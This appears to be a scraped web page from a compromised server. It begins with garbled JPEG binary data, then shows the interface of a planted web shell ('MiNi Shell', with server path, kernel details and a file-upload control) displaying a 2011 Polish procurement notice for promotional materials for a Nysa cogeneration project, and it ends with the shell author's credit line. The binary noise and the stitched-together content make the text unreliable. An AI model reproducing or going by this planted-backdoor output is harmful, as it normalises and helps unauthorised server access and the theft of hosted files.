JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111109/372298-N-2011.html

<p class="kh_header"><b>Nysa: Promocja Projektu pn.: Budowa instalacji do wytwarzania energii elektrycznej i cieplnej w kogeneracji na bazie gazu GZ-50 w Nysie przy ul. Jagiellońskiej 10a.</b><br>
<b>Numer ogłoszenia: 372298 - 2011; data zamieszczenia: 09.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nyska Energetyka Cieplna - Nysa Spółka z o.o. , ul. Jagiellońska 10 a, 48-300 Nysa, woj. opolskie, tel. 077 433 81 44.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.nysa.tensoft.pl/index.php?gid=59b4b7b50504bbb58bca6fa316daf53f&pos=4_4#menuscroll</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Promocja Projektu pn.: Budowa instalacji do wytwarzania energii elektrycznej i cieplnej w kogeneracji na bazie gazu GZ-50 w Nysie przy ul. Jagiellońskiej 10a..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługi w ramach promocji Projektu pn. Budowa instalacji do wytwarzania energii elektrycznej, cieplnej w kogeneracji na bazie gazu ziemnego GZ - 50 w Nysie przy ul. Jagiellońskiej 10A, tj.:

1)	tablice informacyjne i pamiątkowe:

a)	zaprojektowanie i wykonanie tablicy informacyjnej;
Wygląd tablic zgodny z wytycznymi zawartymi w dokumencie - Zasady stosowania znaku, budowania ciągu znaków oraz projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko  2007-2013.
Tablica musi zawierać :
-  tytuł projektu,
-  nazwę beneficjenta,
-  wartość projektu i kwotę dofinansowania,
-  informację o współfinansowaniu ze środków Unii Europejskiej - Projekt współfinansowany przez Unię Europejską ze środków Funduszu Spójności w ramach programu Infrastruktura i Środowisko, emblemat Unii Europejskiej z odwołaniem słownym do Unii Europejskiej oraz odwołaniem słownym do Funduszu Spójności, logo beneficjenta, logo POIiŚ, hasło promocyjne POIiŚ,
-  herb województwa opolskiego z podpisem Urząd Marszałkowski Województwa Opolskiego (zgodnie ze wzorem zamieszczonym na stronie www.rpo.opolskie.pl, zakładka Informacja, promocja, szkolenia/Dokumenty i wytyczne).
Tablica informacyjna powinna być zamontowana na stelażu istniejącej tablicy informacyjnej, która obecnie znajduje się na terenie siedziby Zamawiającego w Nysie przy ul. Jagiellońskiej 10a, po jej wcześniejszym demontażu. Tablica powinna być wykonana z trwałego materiału, odpornego na działanie warunków atmosferycznych, gwarantującego jej trwałość przez okres min. 5 lat. 
Po stronie Wykonawcy leży dostawa tablicy do siedziby Zamawiającego oraz jej montaż.
Tablica wisząca, druk na folii, podkład: dibond 3mm.
Wymiary tablicy  - 2 m szerokość x 1,4 m wysokość. 
Ilość - 1 sztuka.

b)	zaprojektowanie i wykonanie tablicy pamiątkowej - obowiązkowej zgodnie z - Vademecum dla beneficjentów RPO WO 2007-2011 Tom III - Realizacja i rozliczenie projektów.
Wygląd tablicy zgodny z wytycznymi zawartymi w dokumencie - Zasady stosowania znaku, budowania  ciągu znaków oraz projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.
Tablica musi zawierać: 
-  tytuł projektu,
-  opisywać czas realizacji projektu,
-  informację o współfinansowaniu ze środków Unii Europejskiej - Projekt współfinansowany przez Unię Europejską ze środków Funduszu Spójności w ramach programu Infrastruktura i Środowisko,
-  emblemat Unii Europejskiej z odwołaniem słownym do Unii Europejskiej oraz odwołaniem słownym do Funduszu Spójności, logo beneficjenta, logo POIiŚ, hasło promocyjne POIiŚ,
-  herb województwa opolskiego z podpisem Urząd Marszałkowski Województwa Opolskiego ( zgodnie ze wzorem zamieszczonym na stronie www.rpo.opolskie.pl, zakładka Informacja, promocja, szkolenia/Dokumenty i wytyczne).           
Tablica powinna być wykonana z materiału odpornego na działanie warunków atmosferycznych, gwarantującej jej trwałość przez min. 5 lat, nadruk pełen kolor.
Tablica powinna być umocowana na ścianie zewnętrznej budynku kogeneracji na wysokości 2,5 m. 
Po stronie Wykonawcy leży dostawa tablicy do siedziby Zamawiającego oraz jej montaż.
Wymiary tablicy - 0,9 m szerokość x 0,7 m wysokość.
Ilość - 1 sztuka

c)	zaprojektowanie i wykonanie tablicy pamiątkowej ze stali nierdzewnej - nieobowiązkowej zgodnie z - Vademecum dla beneficjentów RPO WO 2007-2011 Tom III - Realizacja i rozliczenie projektów. 
Wygląd tablicy zgodny z wytycznymi zawartymi w dokumencie - Zasady stosowania  znaku, budowania ciągu znaków oraz projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.
Tablica musi zawierać: 
-  tytuł projektu,
-  opisywać czas realizacji projektu,
-  informację o współfinansowaniu ze środków Unii Europejskiej - Projekt współfinansowany przez Unię Europejską ze środków Funduszu Spójności w ramach programu Infrastruktura i Środowisko,
-  emblemat Unii Europejskiej z odwołaniem słownym do Unii Europejskiej oraz odwołaniem słownym do Funduszu Spójności, logo beneficjenta, logo POIiŚ, hasło promocyjne POIiŚ,
-  herb województwa opolskiego z podpisem Urząd Marszałkowski Województwa Opolskiego (zgodnie ze wzorem zamieszczonym na stronie www.rpo.opolskie.pl, zakładka Informacja, promocja, szkolenia/Dokumenty i wytyczne).
Tablica powinna być wykonana ze stali nierdzewnej o grubości co najmniej 5 mm, nadruk w postaci graweru, zabarwiony kolorem czarnym, frontowa strona tablicy powinna być polerowana oraz lakierowana, gwarantująca trwałość napisu przez okres min. 5 lat.
Tablica powinna być umocowana na głazie kamiennym w pobliżu budynku kogeneracji. 
Po stronie Wykonawcy leży dostawa tablicy do siedziby Zamawiającego oraz jej montaż.
Wymiary tablicy - 0,3 m szerokość x 0,25 m wysokość x grubość co najmniej 5 mm.
Ilość - 1 sztuka

2)	artykuł w prasie o zasięgu co najmniej regionalnym.
Do Wykonawcy należeć będzie opracowanie, na podstawie tekstu dostarczonego przez Zamawiającego, artykułu opisującego inwestycję i zamieszczenie go w prasie o zasięgu co najmniej regionalnym o nakładzie nie mniejszym niż 30000 egz.
Artykuł powinien mieć wielkość nie mniejszą niż ( 169 mm szer. X 129 mm wys.), druk kolorowy.
Ilość - 1 artykuł.

3)	zaprojektowanie i wykonanie kalendarza trójdzielnego o wymiarze nie mniejszy niż  (315 mm szer. x 765 mm wys.) Główka kalendarza o wymiarze (315 mm x 195 mm), która będzie zawierać odpowiednie oznakowanie, zgodne z Wytycznymi w dokumencie - Zasady stosowania  znaku, budowania   ciągu   znaków   oraz   projektowania   tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko  2007-2013, nadruk jednostronny, oprawiony na tekturze, zabezpieczony lakierem.
Po stronie Wykonawcy leży dostawa kalendarzy do siedziby Zamawiającego oraz ułożenie we skazanym miejscu.
Ilość - 100 sztuk.

4)	gadżety promocyjne.

a)	zaprojektowanie i wykonanie pamięci flash USB o pojemności min. 8 GB, kompatybilnej z Win98/NT/ME/2000/XP/Vista/Win7, w obudowie gumowej, która będzie zawierać odpowiednie oznakowanie, zgodne z Wytycznymi w dokumencie - Zasady stosowania  znaku, budowania   ciągu   znaków   oraz   projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013, nadruk jednostronny w postaci tampodruku.
Ilość - 50 sztuk.

b)	zaprojektowanie i wykonanie zegara na biurko ze stacją pogodowa z zasilaczem, na stelażu z tworzywa sztucznego lub drewna. Zegar wraz ze stacją pogodową powinien składać się z co najmniej: termometru, higrometru, podświetlanego ekranu LCD, funkcji alarmu oraz daty, który będzie zawierać odpowiednie oznakowanie, zgodne z Wytycznymi w dokumencie - Zasady stosowania  znaku, budowania ciągu znaków oraz projektowania tablic i  naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013, nadruk jednostronny.
Wykonany z tworzywa sztucznego lub drewna, nadruk w postaci tampodruku.
Ilość - 30 sztuk.

c)	zaprojektowanie i wykonanie kulkowego długopisu plastikowego, z profilowanym trzonem, z wkładem do pisania w kolorze niebieskim z mechanizmem na przycisk i gumowym uchwytem, który będzie zawierać odpowiednie oznakowanie, zgodne z Wytycznymi w dokumencie - Zasady stosowania  znaku, budowania ciągu znaków oraz projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko  2007-2013.
Długopis o wymiarach nie mniejszych niż; średnica fi 10 mm i długości 13 cm
Długopis wykonany z tworzywa sztucznego, nadruk jednostronny w postaci tampodruku.
Ilość -   50 sztuk

d)	zaprojektowanie i wykonanie kulkowego długopisu metalowego, z wkładem do pisania w kolorze niebieskim z mechanizmem na przycisk, który będzie zawierać odpowiednie oznakowanie, zgodne z Wytycznymi w dokumencie - Zasady stosowania  znaku, budowania ciągu znaków oraz projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.
Długopis o wymiarach nie mniejszych niż; średnica fi 10 mm i długości 13 cm
Długopis wykonany z metalu, nadruk jednostronny w postaci graweru.
Ilość -   50 sztuk.

e)	zaprojektowanie i wykonanie torby bawełnianej na zakupy z krótkimi uchwytami, która będzie zawierać odpowiednie oznakowanie, zgodne z Wytycznymi w dokumencie - Zasady stosowania  znaku, budowania ciągu znaków oraz projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.
Torba wykonana z bawełny o gramaturze co najmniej 120 g/m2, nadruk jednostronny w postaci sitodruku.
Torba z usztywnianym dnem o wymiarze nie mniejszym niż 42 cm długość x 38 cm wysokość x 7 cm szerokość.
Ilość -   50 sztuk.

f)	zaprojektowanie i wykonanie kubka ze szkła oszronionego, o wysokości nie mniejszej niż 9 cm cm i o pojemności co najmniej 300 ml, który będzie zawierać odpowiednie oznakowanie, zgodne z Wytycznymi w dokumencie - Zasady stosowania  znaku, budowania ciągu znaków oraz projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.
Kubek wykonany ze szkła oszronionego, nadruk w postaci bezpośredniego nałożenia farby.
Ilość -   50 sztuk.

g)	zaprojektowanie i wykonanie smyczy zakończonej karabińczykiem oraz z końcówką do zamocowania telefonu komórkowego, wykonana metodami sublimacji (barwiony materiał) o szer. 15 mm, która będzie zawierać odpowiednie oznakowanie, zgodne z Wytycznymi w dokumencie - Zasady stosowania  znaku, budowania ciągu znaków oraz projektowania tablic i naklejek w promocji projektu beneficjentów Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 oraz będzie zawierać napis: KOGENERACJA - NEC - Nysa Sp. z o.o. Inwestujemy w Twoją przyszłość.
Ilość - 50 sztuk.

4.	Zamawiający wymaga, aby materiały promocyjne były dobrej jakości, charakteryzowały się estetyką i elegancją oraz starannością wykonania.

5.	Wszystkie gadżety powinny być starannie opakowane i zabezpieczone przed uszkodzeniem na czas transportu i podczas składowania w siedzibie Zamawiającego. Jako opakowanie zbiorcze dla każdego z rodzaju zamawianego asortymentu wymagany jest  karton z umieszczoną informacją o przedmiocie zamówienia i jego ilości umieszczonej wewnątrz kartonu.

6.	Po stronie Wykonawcy leży dostawa gadżetów do siedziby Zamawiającego oraz ułożenie we skazanym miejscu.

7.	Przed podpisaniem umowy Wykonawca przedstawi Zamawiającemu po 3 różne wzory każdego materiału promocyjnego będącego przedmiotem zamówienia z których Zamawiający dokona wyboru po jednym wzorze każdego asortymentu.
Akceptacja wybranych wzorów zostanie pisemnie potwierdzona przez Zamawiającego.
Materiały promocyjne dostarczone w ramach umowy będą wykonane zgodnie z zaakceptowanymi przez Zamawiającego wzorami.

8.	W terminie 7 dni od podpisania umowy Wykonawca uzgodni z Zamawiającym wymiary i rozmieszczenie znakowania na zamawianych materiałach promocyjnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5, 79.34.10.00-6, 30.19.21.70-3, 22.46.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wnoszenia wadium przez Wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełnią warunki, dotyczące: posiadania wiedzy i doświadczenia. Wykonawcy muszą spełnić następujące warunki:
wykażą się posiadaniem wiedzy i doświadczenia, tj.: wykażą, że w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej 1 usługę o charakterze i złożoności podobnej do przedmiotu niniejszego zamówienia o wartości co najmniej 7.000,00 PLN netto (słownie: siedem tysięcy złotych), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie.

Za usługi podobne do przedmiotu zamówienia Zamawiający uzna wykonanie kampanii promocyjnej, bądź informacyjnej, które obejmowały co najmniej wykonanie: 
- materiałów promocyjnych - plakatów i/lub tablic informacyjnych i/lub tablic pamiątkowych,
- emisji komunikatów informacyjno-promocyjnych w prasie,
- materiałów reklamowych.

W celu potwierdzenia spełnienia niniejszego warunku, Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego Załącznik Nr 2 do SIWZ - Wykaz wykonanych usług oraz dokumenty potwierdzające, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.nysa.tensoft.pl/index.php?gid=59b4b7b50504bbb58bca6fa316daf53f&pos=4_4#menuscroll<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nyska Energetyka Cieplna - Nysa Spółka z o.o. 48-300 Nysa ul. Jagiellońska 10a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.11.2011 godzina 14:00, miejsce: Nyska Energetyka Cieplna - Nysa Spółka z o.o., ul. Jagiellońska 10a, 48-300 Nysa w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze ogłoszenie w Biuletynie Zamówień Publicznych jest ogłoszeniem nieobowiąkowym. Szacowana wartość zamówienia nie przekracza kwoty 14 tyś. euro.
Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Opolskiego na lata 2007-2013. Projekt Nr RPOP.04.03.00-16-026/10 pn.: Budowa instalacji do wytwarzania energii elektrycznej i cieplnej w kogeneracji na bazie gazu GZ-50 w Nysie przy ul. Jagiellońskiej 10a.
Wymagany termin realizacji zamówienia:
1)	opracowanie i zamieszczenie artykułu w prasie, najpóźniej do dnia 15.12.2011 r.
2)	wykonanie oraz montaż tablic; informacyjnej oraz pamiątkowych, najpóźniej do dnia 12.01.2012 r.
3)	wykonanie i dostawa do siedziby Zamawiającego kalendarzy i gadżetów promocyjnych, najpóźniej do dnia  20.12.2011 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com